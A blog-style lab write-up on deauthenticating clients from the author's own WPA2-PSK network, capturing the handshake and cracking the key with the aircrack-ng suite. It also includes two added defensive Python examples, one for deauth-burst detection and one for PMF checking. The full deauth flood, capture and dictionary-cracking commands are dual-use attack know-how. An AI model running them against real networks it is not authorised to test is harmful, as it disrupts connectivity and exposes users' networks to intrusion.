2025-02-20 Hacking your Wi-Fi¶
Today I will be practicing WPA2-PSK security and attempting to extract and crack a PSK hash. Let’s get started.
Caution
I am not responsible for any malicious, unethical, or destructive behavior done by anyone following this post. I cannot guarantee any of the tools I use are safe. All readers should practice extreme caution when attempting anything written here. You can go to jail if you do not act within the proper scope. All of these exercises were done on personal networks that I had authorization to test.
Note
This post took inspiration from the following book: Network Basics For Hackers by OccupytheWeb, Master, 2023
Step 1 Setting up¶
First, we need to install a few tools:
aircrack-ng
aircrack-ng is one of the most essential tools for any cybersecurity professional. It contains almost everything a hacker needs to monitor and pentest a wireless network.
We will also be using airmon-ng for finding BSSIDs and intercepting traffic. airmon-ng comes in the aircrack-ng suite, so no installation is needed.
Step 2 Compiling¶
I simply needed to run: sudo emerge aircrack-ng
Step 3 Starting aircrack-ng¶
First, we need to figure out what our wireless interface is called. We can run ifconfig to see that my interface is named wlan0.
The next thing we need to do is use airmon-ng (part of the aircrack-ng suite) to put our WLAN adapter into monitor mode with the following command:
airmon-ng start wlan0
This deleted our wlan0 interface and replaced it with wlan0mon. Now let’s intercept a handshake to get our PSK (Pre-Shared Key) hash.
Now, for the purpose of this lab, I will be connecting my phone to the network I am attacking. Its MAC will be “22:8F:1B:9A:10:51”; our AP will be “12:34:56:78:9A:BC”.
First, we need to monitor the network. We can run:
sudo airodump-ng --bssid 12:34:56:78:9A:BC -c 6 -w capture_file wlan0mon
We will get a TUI output like this:
CH 6 ][ Elapsed: 1 min ][ 2025-02-21 11:39
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
12:34:56:78:9A:BC -41 100 675 0 0 6 360 WPA2 CCMP PSK my_network
BSSID STATION PWR Rate Lost Frames Notes Probes
12:34:56:78:9A:BC 22:8F:1B:9A:10:51 -46 0 - 1 0 1863
Let’s break down the important fields here.
Beacons: 675
A beacon is the AP’s way of telling other devices “I exist, come connect,” so we know for sure the AP is up and accepting connections.
We can also see our network uses WPA2-PSK, so we can continue with the attack.
Step 4 Deauth¶
While we keep our monitor program running, let’s try to deauth my phone. We can run the following command to send deauth packets to my phone’s MAC:
sudo aireplay-ng --deauth 500 -a 12:34:56:78:9A:BC -c 22:8F:1B:9A:10:51 -D wlan0mon
If it is successful, we will see an output like this:
11:37:30 Sending 64 directed DeAuth (code 7). STMAC: [22:8F:1B:9A:10:51] [ 0|13 ACKs]
11:37:31 Sending 64 directed DeAuth (code 7). STMAC: [22:8F:1B:9A:10:51] [ 0|22 ACKs]
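The burst shown above is exactly what a wireless IDS keys on: dozens of deauthentication frames to one station within a second, rather than the occasional reason-3 frame a client sends when it leaves on its own. As an added example that is not part of the original post, here is a small sliding-window detector over constructed frame records (timestamp, 802.11 subtype, BSSID, station, reason code); the MAC addresses are the ones used in this lab and the thresholds are assumptions.

```python
from collections import defaultdict, deque

DEAUTH, DISASSOC, BEACON = 12, 10, 8   # 802.11 management-frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"

def detect_deauth_bursts(frames, window_s=1.0, threshold=20):
    """Return one alert per (bssid, station) pair that sees more than
    `threshold` deauth/disassoc frames inside any `window_s`-second window.
    frames: iterable of (timestamp, subtype, bssid, station, reason_code)."""
    recent = defaultdict(deque)        # (bssid, station) -> timestamps in window
    alerts, alerted = [], set()
    for ts, subtype, bssid, sta, reason in sorted(frames, key=lambda f: f[0]):
        if subtype not in (DEAUTH, DISASSOC):
            continue                   # beacons, data etc. are irrelevant here
        key = (bssid, sta)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window_s:    # slide the window forward
            q.popleft()
        if len(q) > threshold and key not in alerted:
            alerted.add(key)           # report each pair once per capture
            alerts.append({"bssid": bssid, "station": sta, "count": len(q),
                           "reason": reason, "broadcast": sta == BROADCAST})
    return alerts

def sample_frames():
    """Constructed capture: one legitimate deauth (reason 3, station leaving),
    a beacon, then a 64-frame directed burst with reason code 7, 10 ms apart,
    mirroring the aireplay-ng output above."""
    ap, phone = "12:34:56:78:9a:bc", "22:8f:1b:9a:10:51"
    frames = [(0.0, DEAUTH, ap, phone, 3), (5.0, BEACON, ap, BROADCAST, 0)]
    frames += [(10.0 + i * 0.01, DEAUTH, ap, phone, 7) for i in range(64)]
    return frames

if __name__ == "__main__":
    for a in detect_deauth_bursts(sample_frames()):
        print(f"deauth burst: {a['count']} frames from {a['bssid']} "
              f"to {a['station']} (reason {a['reason']})")
```

A burst aimed at the broadcast address (the unanchored form of the attack later in this post) is flagged the same way, with `broadcast` set in the alert.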
Step 5 Coming to terms¶
At this point, we realize that our router has Protected Management Frames (PMF) enabled. We know this by filtering in Wireshark: we can inspect our wlan0mon beacons and find the RSN/Auth information:
Auth Key Management (AKM) Suite Count: 1
Auth Key Management (AKM) List 00:1a:2b (IEEE 802.11) PSK
PMF (802.11w) is a security measure that protects unicast and multicast management action frames, which prevents this type of deauthentication attack [1].
BUT for the sake of this lab, we can disable this and get hacking.
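The same information Wireshark shows above can be read straight from the beacon’s RSN information element (element ID 48): the AKM list tells you it is PSK, and the RSN Capabilities field carries the MFPC (capable) and MFPR (required) bits. As an added example that is not part of the original post, here is a parser for that element with a defender-side verdict; the three sample elements are constructed, and the suite-selector OUI 00-0F-AC is the IEEE 802.11 value.

```python
import struct

IEEE_OUI = bytes.fromhex("000fac")       # IEEE 802.11 suite-selector OUI (00-0F-AC)
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104", 9: "GCMP-256"}
AKMS = {1: "802.1X", 2: "PSK", 6: "PSK-SHA256", 8: "SAE"}

def _suite(raw: bytes, names: dict) -> str:
    """Render a 4-byte suite selector (3-byte OUI + 1-byte type)."""
    if raw[:3] == IEEE_OUI:
        return names.get(raw[3], f"IEEE-type-{raw[3]}")
    return raw.hex(":")

def parse_rsn_ie(ie: bytes) -> dict:
    """Parse an RSN information element (element ID 48) from a beacon body."""
    if len(ie) < 2 or ie[0] != 48 or len(ie) != 2 + ie[1]:
        raise ValueError("not a complete RSN IE")
    body, off = ie[2:], 0
    def take(n: int) -> bytes:       # bounds-checked cursor over the element body
        nonlocal off
        if off + n > len(body):
            raise ValueError("truncated RSN IE")
        chunk, off = body[off:off + n], off + n
        return chunk
    version = struct.unpack("<H", take(2))[0]
    group = _suite(take(4), CIPHERS)
    pairwise = [_suite(take(4), CIPHERS) for _ in range(struct.unpack("<H", take(2))[0])]
    akms = [_suite(take(4), AKMS) for _ in range(struct.unpack("<H", take(2))[0])]
    # RSN Capabilities is optional; MFPR is bit 6 and MFPC is bit 7.
    caps = struct.unpack("<H", take(2))[0] if off + 2 <= len(body) else 0
    return {"version": version, "group_cipher": group, "pairwise_ciphers": pairwise,
            "akms": akms, "mfp_capable": bool(caps & 0x80), "mfp_required": bool(caps & 0x40)}

def pmf_verdict(info: dict) -> str:
    """Summarise what the RSN IE says about management-frame protection."""
    if info["mfp_required"]:
        return "PMF required: spoofed deauthentication frames are dropped by clients"
    if info["mfp_capable"]:
        return "PMF optional: clients that do not negotiate it remain deauthable"
    return "PMF disabled: unprotected management frames, deauthentication is spoofable"

# Constructed sample IEs (WPA2-PSK / CCMP), differing only in RSN Capabilities.
RSN_NO_PMF  = bytes.fromhex("3014 0100 000fac04 0100 000fac04 0100 000fac02 0000")
RSN_PMF_OPT = bytes.fromhex("3014 0100 000fac04 0100 000fac04 0100 000fac02 8000")
RSN_PMF_REQ = bytes.fromhex("3014 0100 000fac04 0100 000fac04 0100 000fac02 c000")

if __name__ == "__main__":
    for name, ie in [("no PMF", RSN_NO_PMF), ("optional", RSN_PMF_OPT), ("required", RSN_PMF_REQ)]:
        info = parse_rsn_ie(ie)
        print(name, info["akms"], info["pairwise_ciphers"], "->", pmf_verdict(info))
```

Only the MFPR bit gives real protection; an AP that is merely MFPC still talks unprotected management frames to clients that do not support 802.11w.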
Step 6 Redemption¶
Now that I have set up a badly configured router (don’t worry, it stays on the LAN only), we can actually proceed with the deauth attack.
I will connect my phone to our Wi-Fi network and run the following command:
sudo aireplay-ng --deauth 1000 -a 12:34:56:78:9A:BC wlan0mon
Note
I could pass my phone’s MAC (hence the warning); however, this way disconnects every device from the network.
Step 7 Stealing the password¶
After sending our deauth packets, we will monitor our network with airodump-ng to intercept the 4-way handshake our phone makes after the deauth attack ends.
We need to keep sending deauthentication packets until we see WPA handshake: XX:XX:XX:XX:XX:XX appear in the top right corner of our airodump-ng interface.
CH 6 | Elapsed: 42 s | 2025-02-22 01:48 | **WPA handshake: 12:34:56:78:9A:BC**
Once we see this, we can safely kill the attack and the monitor since we have intercepted the PSK hash.
Step 8 Getting the password¶
Now all we have to do is crack the password. For this, we will use aircrack-ng. We will also need a wordlist. I will be using the 10k most common password list for this lab. To begin brute forcing, we will run:
aircrack-ng netgeargetpsk-01.cap -w ../../lists/10kcommon.txt
And in about 2 seconds, we can see the password in cleartext!
Aircrack-ng 1.7
[00:00:00] 8776/10000 keys tested (18813.56 k/s)
Time left: 0 seconds 87.76%
KEY FOUND! [ password ]
Conclusions¶
When I first started learning networks, I didn’t think I would ever enjoy learning how Wi-Fi worked, but this lab has made me realize wireless networks are one of the most interesting parts of networking. I am considering trying a Bluetooth-based attack next.